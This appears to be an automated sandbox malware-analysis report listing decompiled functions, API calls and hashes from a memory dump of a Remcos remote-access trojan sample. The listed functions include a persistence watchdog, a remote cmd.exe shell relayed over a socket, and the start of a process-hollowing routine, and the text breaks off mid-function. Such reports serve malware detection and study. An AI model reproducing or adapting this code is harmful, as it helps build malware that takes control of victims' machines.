Instruction ID: 8cb75833b7b90d96c724ef9dbfcbb4618f137305d640e4d88b020117668a2972
Opcode Fuzzy Hash: 89cebbe0198638ea8ec5d5e87b0717fa0c6332f7e957d641d40c1ab821c69aa3
Instruction Fuzzy Hash: C8F0BE712142045BCB0CDF359C50BAA37995B01368B684F7FF02ADA2E0D73AED85824C

Uniqueness

Uniqueness Score: -1.00%

Function 0043BC60, Relevance: 3.0, APIs: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E0043BC60(void* __ebx, void* __ecx) {
				void* _t2;
				intOrPtr _t3;
				signed int _t15;
				signed int _t16;

				if( *0x46b4d0 == 0) {
					_push(_t15);
					L00445E89(__ecx); // executed
					_t2 = E0044618A(); // executed
					_t19 = _t2;
					if(_t2 != 0) {
						_t3 = L0043BD0D(__ebx, _t19);
						if(_t3 != 0) {
							 *0x46b4dc = _t3;
							E0043C593(0x46b4d0, _t3);
							_t16 = 0;
						} else {
							_t16 = _t15 | 0xffffffff;
						}
						L0043EE85(0);
					} else {
						_t16 = _t15 | 0xffffffff;
					}
					L0043EE85(_t19);
					return _t16;
				} else {
					return 0;
				}
			}

0x0043bc67
0x0043bc6d
0x0043bc6e
0x0043bc73
0x0043bc78
0x0043bc7c
0x0043bc84
0x0043bc8c
0x0043bc99
0x0043bc9e
0x0043bca3
0x0043bc8e
0x0043bc8e
0x0043bc8e
0x0043bca7
0x0043bc7e
0x0043bc7e
0x0043bc7e
0x0043bcae
0x0043bcb8
0x0043bc69
0x0043bc6b
0x0043bc6b

APIs

_free.LIBCMT ref: 0043BCAE

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: fc42f79b8ad90ff9e372cafe42fdf45c445252fd44af95580301e25e76e68aca
Instruction ID: f5c1e8700fa4c73b89e1ffdaca2bb6bc95b989d21a6d87f46a2dcb34975a020f
Opcode Fuzzy Hash: fc42f79b8ad90ff9e372cafe42fdf45c445252fd44af95580301e25e76e68aca
Instruction Fuzzy Hash: EBE0E522602D2025E631223B6C16B5B0254CBC9339F11332FF624C62C2EF6C484391DF

Uniqueness

Uniqueness Score: -1.00%

Function 0041802D, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0041802D(void* __ecx, void* __edx, void* __eflags) {
				signed int _t21;
				intOrPtr _t28;
				intOrPtr* _t31;
				signed int* _t37;
				void* _t39;
				signed int _t46;
				signed int _t56;
				void* _t58;
				void* _t60;

				_t39 = __ecx;
				E00450918(0x451ee2, _t58);
				 *((intOrPtr*)(_t58 - 0x10)) = _t60 - 0xc;
				_t21 = E0040270D( *(_t58 + 8)); // executed
				_t56 = _t21;
				 *(_t58 - 0x18) = _t56;
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x14)) = E00402113();
				_t37 = E0040211C(_t39);
				E0041819A( *_t37,  *_t22, _t56);
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				 *(_t58 - 0x18) = E004021D5(_t39);
				if( *_t37 != 0) {
					E0040272A( *_t37,  *((intOrPtr*)( *((intOrPtr*)(_t58 - 0x14)))));
					_t31 = E00402716();
					asm("cdq");
					_t46 = 0x18;
					E00402708( *_t37, ( *_t31 -  *_t37) / _t46);
				}
				 *((intOrPtr*)(E00402716())) =  *(_t58 + 8) * 0x18 + _t56;
				_t28 =  *(_t58 - 0x18) * 0x18 + _t56;
				 *((intOrPtr*)( *((intOrPtr*)(_t58 - 0x14)))) = _t28;
				 *_t37 = _t56;
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t28;
			}

0x0041802d
0x00418032
0x0041803d
0x00418045
0x0041804a
0x0041804c
0x0041804f
0x0041805c
0x00418064
0x0041806b
0x00418070
0x0041807b
0x00418081
0x0041808a
0x00418091
0x0041809a
0x0041809d
0x004180a3
0x004180a3
0x004180b5
0x004180bb
0x004180c0
0x004180c2
0x004180c7
0x004180d4

APIs

__EH_prolog.LIBCMT ref: 00418032

Part of subcall function 00402708: std::_Deallocate.LIBCONCRT ref: 00402B02

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: DeallocateH_prologstd::_
String ID:
API String ID: 3881773970-0
Opcode ID: 40f51b9818e89e780d865b1c604ff91c11b4c4eac2b1db593ce02cbc82ce4dee
Instruction ID: 914169546bcfb13f86173e0ac268560dbc3619b257dda30fd6d67c0ed2bcabb4
Opcode Fuzzy Hash: 40f51b9818e89e780d865b1c604ff91c11b4c4eac2b1db593ce02cbc82ce4dee
Instruction Fuzzy Hash: 96118171A001189FCB05EFA9C9867BDBBB6EF85314F10416FF500AB2E5DBB50A04DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00446F04, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00446F04(void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t35;

				_push(_t26);
				_push(_t26);
				_t16 = E0043DFD9(_t26, 0x40, 0x30); // executed
				_t31 = _t16;
				_v12 = _t31;
				_t28 = _t30;
				if(_t31 != 0) {
					_t2 = _t31 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t31 - _t17;
					if(__eflags != 0) {
						_t3 = _t31 + 0x20; // 0x20
						_t35 = _t3;
						_t33 = _t17;
						do {
							_t4 = _t35 - 0x20; // 0x0
							E00441200(_t28, _t35, __eflags, _t4, 0xfa0, 0);
							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
							 *_t35 = 0;
							_t35 = _t35 + 0x30;
							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
							 *((char*)(_t35 - 0x24)) = 0xa;
							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
							 *((char*)(_t35 - 0x22)) = 0;
							__eflags = _t35 - 0x20 - _t33;
						} while (__eflags != 0);
						_t31 = _v12;
					}
				} else {
					_t31 = 0;
				}
				L0043EE85(0);
				return _t31;
			}

0x00446f09
0x00446f0a
0x00446f11
0x00446f16
0x00446f1a
0x00446f1e
0x00446f21
0x00446f27
0x00446f27
0x00446f2d
0x00446f2f
0x00446f32
0x00446f32
0x00446f35
0x00446f37
0x00446f3d
0x00446f41
0x00446f46
0x00446f4a
0x00446f4c
0x00446f4f
0x00446f55
0x00446f5c
0x00446f60
0x00446f64
0x00446f67
0x00446f67
0x00446f6b
0x00446f6e
0x00446f23
0x00446f23
0x00446f23
0x00446f70
0x00446f7d

APIs

Part of subcall function 0043DFD9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00440A27,00000001,00000364,?,?,?,00439E19,0043E660,?,?,0042EB9C,?), ref: 0043E01A

_free.LIBCMT ref: 00446F70

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 75e6fae31728f888b64d51e2d6c317a2358abb37705ea3aa09a0af9ce1a41e34
Instruction ID: 23aad036ae6f17db2e0663352f7d84b44f45e927c1115f9ad6e8add9e9eddc01
Opcode Fuzzy Hash: 75e6fae31728f888b64d51e2d6c317a2358abb37705ea3aa09a0af9ce1a41e34
Instruction Fuzzy Hash: 74012B721003045BF321CE66A84195AFBD9EB89370F25061EF1D5832C0EA34A806C639

Uniqueness

Uniqueness Score: -1.00%

Function 0043DFD9, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E0043DFD9(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x46ba48, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E0043DA2B();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(L00439E14())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E0043B454(_t15, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x0043dfd9
0x0043dfdf
0x0043dfe4
0x0043dff2
0x0043dff2
0x0043dff8
0x0043dffa
0x0043dffa
0x0043e011
0x0043e01a
0x0043e022
0x00000000
0x00000000
0x0043e002
0x0043e004
0x0043e026
0x0043e02b
0x0043e031
0x00000000
0x0043e031
0x0043e007
0x0043e00c
0x0043e00d
0x0043e00f
0x00000000
0x00000000
0x0043e00f
0x00000000
0x0043e011
0x0043dfea
0x0043dff0
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00440A27,00000001,00000364,?,?,?,00439E19,0043E660,?,?,0042EB9C,?), ref: 0043E01A

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8569ba8bb3dfe10de3eff81386eea769e023cbff83682933c5f2bb37d3797f74
Instruction ID: 663c9c82ebf97961fafe3911b2e4c40e26a949f0542b4df7170369435b6add4f
Opcode Fuzzy Hash: 8569ba8bb3dfe10de3eff81386eea769e023cbff83682933c5f2bb37d3797f74
Instruction Fuzzy Hash: 59F0BB3160653557DB395E23EC01B5B3798DF497A0F14A027B814DA2C1DAB8EC0186ED

Uniqueness

Uniqueness Score: -1.00%

Function 0043E61D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0043E61D(void* __ecx, long _a4) {
				void* __esi;
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(L00439E14())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x46ba48, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E0043DA2B();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E0043B454(_t7, _t8, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x0043e61d
0x0043e623
0x0043e629
0x0043e65b
0x0043e660
0x0043e666
0x00000000
0x0043e666
0x0043e62d
0x0043e62f
0x0043e62f
0x0043e646
0x0043e64f
0x0043e657
0x00000000
0x00000000
0x0043e637
0x0043e639
0x00000000
0x00000000
0x0043e63c
0x0043e641
0x0043e642
0x0043e644
0x00000000
0x00000000
0x0043e644
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c1b7ba9daf246cf14b06da96cbece8f2dfc4c6b64a33084c75cf4e9e186f68fd
Instruction ID: 761367eb3325334cb03087efa579907c72301f2aae35437ee7483717dcd89be7
Opcode Fuzzy Hash: c1b7ba9daf246cf14b06da96cbece8f2dfc4c6b64a33084c75cf4e9e186f68fd
Instruction Fuzzy Hash: 0AE0E53120321496E63126679D03B5B3748CB693A0F552027EC04962D1DB68CC0189ED

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040F4B7, Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 194
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040F4B7(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				char _v84;
				void* _v88;
				char _v100;
				char _v104;
				void* _v108;
				char _v124;
				char _v128;
				long _v132;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				void* _t29;
				void* _t35;
				void* _t46;
				void* _t61;
				void* _t78;
				void* _t107;
				long _t112;
				long _t141;
				void* _t142;
				CHAR* _t143;
				void* _t145;
				signed int _t147;
				void* _t149;
				void* _t155;

				_t149 = (_t147 & 0xfffffff8) - 0x7c;
				_push(_t142);
				_t26 = GetCurrentProcessId();
				if(E004105A0(0x46c518, L00401F75(0x46c518), "WD", _t26) != 0) {
					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
					__eflags = _t29;
					if(_t29 == 0) {
						E004020B5(0x46c518,  &_v100);
						E00417334(L00401ECB(0x46c500),  &_v100);
						L00401F4D(0x46c518,  &_v124);
						__eflags = L00416F6C( &_v124);
						if(__eflags != 0) {
							_t35 = E0040425F(0x46c518,  &_v76, L"\\SysWOW64");
							L00401EDA( &_v132, _t37, _t142, E00403010( &_v36, E0040425F(0x46c518,  &_v56, E0043918F(0x46c518,  &_v76, __eflags, L"WinDir")), _t35));
							L00401ED0();
							L00401ED0();
						} else {
							_t61 = E0040425F(0x46c518,  &_v28, L"\\system32");
							L00401EDA( &_v132, _t63, _t142, E00403010( &_v84, E0040425F(0x46c518,  &_v56, E0043918F(0x46c518,  &_v28, __eflags, L"WinDir")), _t61));
							L00401ED0();
							L00401ED0();
						}
						L00401ED0();
						E0040766E(0x46c518,  &_v124, 0, L"\\svchost.exe");
						_t143 = L00401F75( &_v104);
						_t46 = E00413ACA(L00401ECB( &_v128), _t143, 0x46bd50);
						_t150 = _t149 - 0x18;
						_t107 = _t149 - 0x18;
						__eflags = _t46;
						if(_t46 != 0) {
							E00402064(0x46c518, _t107, "Watchdog module activated");
							E00402064(0x46c518, _t150 - 0x18, "[Info]");
							E004165D8(0x46c518, 0);
							Sleep(0x7d0);
							_t112 =  *0x46bd58; // 0x0
							goto L13;
						}
						E00402064(0x46c518, _t107, "Watchdog launch failed!");
						E00402064(0x46c518, _t150 - 0x18, "[ERROR]");
						E004165D8(0x46c518, 0);
						CloseHandle( *0x46bd60);
						L00401ED0();
						L00401FA7();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t29);
						_t155 = _t149 - 0x18;
						E00402064(0x46c518, _t155, "Remcos restarted by watchdog!");
						_t156 = _t155 - 0x18;
						E00402064(0x46c518, _t155 - 0x18, "[Info]");
						E004165D8(0x46c518, 0);
						E00402064(0x46c518, _t156 + 0x18, "Watchdog module activated");
						E00402064(0x46c518, _t156 + 0x18 - 0x18, "[Info]");
						E004165D8(0x46c518, 0);
						CreateThread(0, 0, E0040FAE9, 0, 0, 0);
						_t143 = "WDH";
						_t78 = E00410275(L00401F75(0x46c518), _t143,  &_v148);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L1;
						} else {
							 *0x46bd50 = OpenProcess(0x1fffff, 0, _v132);
							E004106D2(L00401F75(0x46c518), __eflags, _t143);
							_t112 = _v132;
							L13:
							L14();
							asm("int3");
							_push(_t143);
							_push(0);
							_t141 = _t112;
							L15:
							_t145 = OpenProcess(0x100000, 0, _t141);
							WaitForSingleObject(_t145, 0xffffffff);
							CloseHandle(_t145);
							__eflags =  *0x46bd4e;
							if(__eflags != 0) {
								E0040F4B7(__eflags, 0);
							}
							goto L15;
						}
						L17:
					}
				} else {
					L1:
				}
				return 1;
				goto L17;
			}

APIs

GetCurrentProcessId.KERNEL32 ref: 0040F4C3

Part of subcall function 004105A0: RegCreateKeyA.ADVAPI32(80000001,00000000,0045F6AC), ref: 004105AE
Part of subcall function 004105A0: RegSetValueExA.ADVAPI32(0045F6AC,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040AA06,0045FF08,00000001,000000AF,0045F6AC), ref: 004105C9
Part of subcall function 004105A0: RegCloseKey.ADVAPI32(0045F6AC,?,?,?,0040AA06,0045FF08,00000001,000000AF,0045F6AC), ref: 004105D4

OpenMutexA.KERNEL32 ref: 0040F4FD
CloseHandle.KERNEL32(00000000), ref: 0040F50C
CreateThread.KERNEL32(00000000,00000000,0040FAE9,00000000,00000000,00000000), ref: 0040F562
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040F72A

Strings

Remcos restarted by watchdog!, xrefs: 0040F517
WDH, xrefs: 0040F56C, 0040F572, 0040F730
[ERROR], xrefs: 0040F6E4
\SysWOW64, xrefs: 0040F612
Watchdog module activated, xrefs: 0040F53B, 0040F6A1
WinDir, xrefs: 0040F5CF, 0040F621
[Info], xrefs: 0040F524, 0040F52B, 0040F54A, 0040F6B0
Mutex_RemWatchdog, xrefs: 0040F4F0
Watchdog launch failed!, xrefs: 0040F6D5
\svchost.exe, xrefs: 0040F667
\system32, xrefs: 0040F5C0

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
API String ID: 3018269243-3797382479
Opcode ID: 9a450aa8e62453cedb2b6a9f1df7688fd550d8ff6fd6e02ad1a1d14d9fda7133
Instruction ID: 06e747cae4c44867ce0b5dbd908e93f043d73082a9d6ea5748c6826fd798d0d4
Opcode Fuzzy Hash: 9a450aa8e62453cedb2b6a9f1df7688fd550d8ff6fd6e02ad1a1d14d9fda7133
Instruction Fuzzy Hash: 6751ED316043006BC618FB72DD1B86F77659E90759F50083FF942731E2EE789A0986AF

Uniqueness

Uniqueness Score: -1.00%

Function 0040559D, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 283
pipesleepfileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040559D(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v40;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t70;
				void* _t79;
				CHAR* _t80;
				int _t98;
				intOrPtr* _t107;
				intOrPtr _t138;
				signed int _t146;
				signed int _t147;
				long _t151;
				void* _t155;
				intOrPtr* _t156;
				void* _t163;
				void* _t168;
				void* _t175;

				_t156 = _t155 - 0x3c;
				_push(_t146);
				_t138 =  *((intOrPtr*)( *[fs:0x2c]));
				_t147 = _t146 | 0xffffffff;
				_t98 = 0;
				if( *0x46dcd0 >  *((intOrPtr*)(_t138 + 4))) {
					E0042EA6C(0x46dcd0);
					_t160 =  *0x46dcd0 - _t147;
					if( *0x46dcd0 == _t147) {
						E00404818(0, 0x46dc48, 0);
						L0042EDF6(_t160, E00452023);
						 *_t156 = 0x46dcd0;
						E0042EA2D(_t147);
					}
				}
				if( *0x46dcb0 >  *((intOrPtr*)(_t138 + 4))) {
					E0042EA6C(0x46dcb0);
					_t162 =  *0x46dcb0 - _t147;
					if( *0x46dcb0 == _t147) {
						E004020B5(_t98, 0x46dcd8);
						L0042EDF6(_t162, E00452019);
						E0042EA2D(_t147, 0x46dcb0);
					}
				}
				_t100 =  &_v40;
				E004020B5(_t98,  &_v40);
				_t139 = 0x46c2d0;
				_v8 = _t98;
				_t163 =  *0x46bae2 - _t98; // 0x0
				if(_t163 != 0) {
					L12:
					_v12 = _t98;
					PeekNamedPipe( *0x46dcb8, _t98, _t98, _t98,  &_v12, _t98);
					if(_v12 <= _t98) {
						_t156 = _t156 - 0x18;
						E00402064(_t98, _t156, 0x45f6ac);
						_push(0x62);
						_t147 = E00404A6E(_t98, 0x46dc48, _t136, __eflags);
						goto L21;
					}
					_push(_v12);
					_t56 = L00438E06(_t100);
					_t140 = _t56;
					ReadFile( *0x46dcb8, _t56, _v12,  &_v16, _t98);
					if(_v16 <= _t98) {
						L19:
						L00438E01(_t140);
						_t139 = 0x46c2d0;
						goto L21;
					}
					if(_v8 <= _t98) {
						L17:
						E00402064(_t98,  &_v64, _t140);
						_t156 = _t156 - 0x18;
						_t107 = _t156;
						_push(_v16);
						_push(_t98);
						L18:
						E004059C7(_t98, _t107, _t136, _t172);
						_t147 = E00404A6E(_t98, 0x46dc48, _t136, _t172, 0x62,  &_v64);
						L00401FA7();
						goto L19;
					}
					_t66 = L00438E20(_t140, L00401F75( &_v40), _v8);
					_t156 = _t156 + 0xc;
					_t172 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E00402064(_t98,  &_v64, _t140);
					_t156 = _t156 - 0x18;
					_t107 = _t156;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t136 = "cmd.exe";
					_t70 = E00405A22("cmd.exe");
					_t164 = _t70;
					if(_t70 == 0) {
						L26:
						L00404DD5(0x46dc48);
						CloseHandle( *0x46dcb8);
						CloseHandle( *0x46dcd4);
						 *0x46bae2 = _t98;
						_t98 = 1;
						L27:
						L00401FA7();
						L00401FA7();
						return _t98;
					}
					E004059BE(_t98, 0x46dcd8, E0043919A(_t98, _t164, "SystemDrive"));
					E004059B5(_t98, 0x46dcd8, 0x46c2d0, "\\");
					0x46dbf0->nLength = 0xc;
					 *0x46dbf8 = 1;
					 *0x46dbf4 = _t98;
					if(CreatePipe(0x46dccc, 0x46dcb4, 0x46dbf0, _t98) == 0 || CreatePipe(0x46dcb8, 0x46dcd4, 0x46dbf0, _t98) == 0) {
						goto L27;
					} else {
						_t151 = 0x44;
						E00431810(0x46dc00, 0x46dc00, _t98, CreatePipe);
						0x46dc00->cb = _t151;
						 *0x46dc2c = 0x101;
						 *0x46dc30 = 0;
						 *0x46dc38 =  *0x46dccc;
						_t79 =  *0x46dcd4;
						 *0x46dc3c = _t79;
						 *0x46dc40 = _t79;
						_t80 = L00401F75(0x46dcd8);
						 *0x46bae2 = CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc) != 0;
						E004059BE(_t98, 0x46c2d0, 0x45f6ac);
						 *0x46bae3 = 1;
						E00404955(0x46dc48);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E004049D2("cmd.exe");
						_t156 = _t156 + 0xc - 0xfffffffffffffff8;
						E004020CC(_t98, _t156, "cmd.exe", CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc),  &_a4);
						_push(0x93);
						_t100 = 0x46dc48;
						_t147 = E00404A6E(_t98, 0x46dc48, "cmd.exe", CreateProcessA(_t98, L00401F75(0x46c2d0), _t98, _t98, 1, _t98, _t98, _t80, 0x46dc00, 0x46dcbc));
						Sleep(0x12c);
						_t168 =  *0x46bae2 - _t98; // 0x0
						if(_t168 == 0) {
							goto L26;
						}
						_t139 = 0x46c2d0;
						do {
							goto L12;
							L21:
							_t38 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							_t100 = _t139;
							 *0x46bae3 =  <=  ? 0 :  *0x46bae3 & 0x000000ff;
							if(E00402469() == 0) {
								_v8 = _t98;
							} else {
								E004059B5(_t98, _t139, _t139, "\n");
								L00401F8D( &_v40, _t139);
								_t52 = E00402469();
								WriteFile( *0x46dcb4, L00401F75(_t139), _t52,  &_v8, _t98);
								_t100 = _t139;
								E004059BE(_t98, _t139, 0x45f6ac);
							}
							Sleep(0x64);
							_t175 =  *0x46bae3 - _t98; // 0x0
						} while (_t175 != 0);
						TerminateProcess(0x46dcbc->hProcess, _t98);
						CloseHandle( *0x46dcc0);
						CloseHandle( *0x46dcbc);
						goto L26;
					}
				}
			}

APIs

__Init_thread_footer.LIBCMT ref: 004055EF

Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2

__Init_thread_footer.LIBCMT ref: 0040562C
CreatePipe.KERNEL32(0046DCCC,0046DCB4,0046DBF0,00000000,0045F6C4,00000000), ref: 004056B7
CreatePipe.KERNEL32(0046DCB8,0046DCD4,0046DBF0,00000000), ref: 004056CD
CreateProcessA.KERNEL32 ref: 00405740
Sleep.KERNEL32(0000012C,00000093,?), ref: 004057A7
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004057CF
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004057F8

Part of subcall function 0042EDF6: __onexit.LIBCMT ref: 0042EDFC

WriteFile.KERNEL32(00000000,00000000,?,00000000,0046C2D0,0045F6C8,00000062,0045F6AC), ref: 004058E5
Sleep.KERNEL32(00000064,00000062,0045F6AC), ref: 004058FE
TerminateProcess.KERNEL32(00000000), ref: 00405917
CloseHandle.KERNEL32 ref: 00405923
CloseHandle.KERNEL32 ref: 0040592F
CloseHandle.KERNEL32 ref: 00405945
CloseHandle.KERNEL32 ref: 00405951

Strings

SystemDrive, xrefs: 00405662
cmd.exe, xrefs: 0040564E

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: f3f296f1679a69185446eb36fae990717c7b1ee753301a2b67895b627e89174f
Instruction ID: 36aeaf24663ea89ca73ce0651989de9eb03545aec66eda9801f6c68c010dee92
Opcode Fuzzy Hash: f3f296f1679a69185446eb36fae990717c7b1ee753301a2b67895b627e89174f
Instruction Fuzzy Hash: 1391B371F00208ABD714BB669D4696E3B69EB45714B10407FF901B72E2EFB88D01DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00413ACA, Relevance: 25.7, APIs: 17, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00413ACA(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
				void _v8;
				signed int _v12;
				void* _v16;
				CONTEXT* _v20;
				WCHAR* _v24;
				struct _STARTUPINFOW _v92;
				void* __edi;
				void* _t58;
				void _t72;
				void* _t73;
				int _t83;
				intOrPtr* _t95;
				void* _t98;
				signed int _t102;
				void* _t104;
				void* _t106;
				CONTEXT* _t110;
				void* _t113;
				CONTEXT* _t114;
				struct _PROCESS_INFORMATION* _t116;

				_v8 = _v8 & 0x00000000;
				_v16 = __edx;
				_v24 = __ecx;
				if( *__edx == 0x5a4d) {
					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
					if( *_t95 == 0x4550) {
						_push(_t106);
						E00431810(_t106,  &_v92, 0, 0x44);
						_t116 = _a4;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
							L21:
							_t58 = 0;
							L22:
							L23:
							return _t58;
						}
						CloseHandle(_v92.hStdInput);
						CloseHandle(_v92.hStdOutput);
						CloseHandle(_v92.hStdError);
						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
						_v20 = _t110;
						_t110->ContextFlags = 0x10007;
						_t14 =  &(_t116->hThread); // 0xffffdcf2
						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
							L20:
							TerminateProcess(_t116->hProcess, 0);
							CloseHandle(_t116->hProcess);
							_t50 =  &(_t116->hThread); // 0xffffdcf2
							CloseHandle( *_t50);
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							goto L21;
						} else {
							_t72 = _v8;
							if(_t72 ==  *(_t95 + 0x34)) {
								 *0x46bd28(_t116->hProcess, _t72);
							}
